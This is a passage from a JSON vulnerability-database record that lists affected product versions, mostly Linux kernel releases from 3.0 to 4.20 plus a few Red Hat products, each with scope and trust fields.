        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.4"
      },
      {
        "model": "enterprise mrg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.2"
      },
      {
        "model": "kernel 4.7-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.34"
      },
      {
        "model": "kernel 3.14-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.22"
      },
      {
        "model": "kernel 4.15-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.11"
      },
      {
        "model": "kernel 3.19-rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.71"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.18"
      },
      {
        "model": "kernel 3.15-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.87"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.90"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.3"
      },
      {
        "model": "kernel 4.17-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.71"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.71"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.67"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.70"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.8"
      },
      {
        "model": "kernel 4.4-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "kernel 3.9-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.5"
      },
      {
        "model": "kernel 4.9-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.1"
      },
      {
        "model": "kernel 4.14-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 3.13-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.105"
      },
      {
        "model": "kernel 3.14-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.8"
      },
      {
        "model": "kernel 4.11-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.76"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.11"
      },
      {
        "model": "kernel 3.9-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.82"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.91"
      },
      {
        "model": "kernel 3.8-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.3"
      },
      {
        "model": "kernel 4.5-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.20.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.8"
      },
      {
        "model": "kernel 4.11-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.11"
      },
      {
        "model": "kernel 3.19-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.66"
      },
      {
        "model": "kernel 3.15-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.20.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.93"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.7"
      },
      {
        "model": "kernel 3.9-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.11-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.67"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "kernel 3.11-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.43"
      },
      {
        "model": "kernel 4.9-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.18"
      },
      {
        "model": "kernel 3.11-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.44"
      },
      {
        "model": "kernel 4.4-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.2"
      },
      {
        "model": "kernel 3.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4"
      },
      {
        "model": "kernel 4.16-rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.6"
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.3"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "kernel 4.16-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.11"
      },
      {
        "model": "kernel 3.7-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "kernel 4.7-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.2"
      },
      {
        "model": "kernel 4.18-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
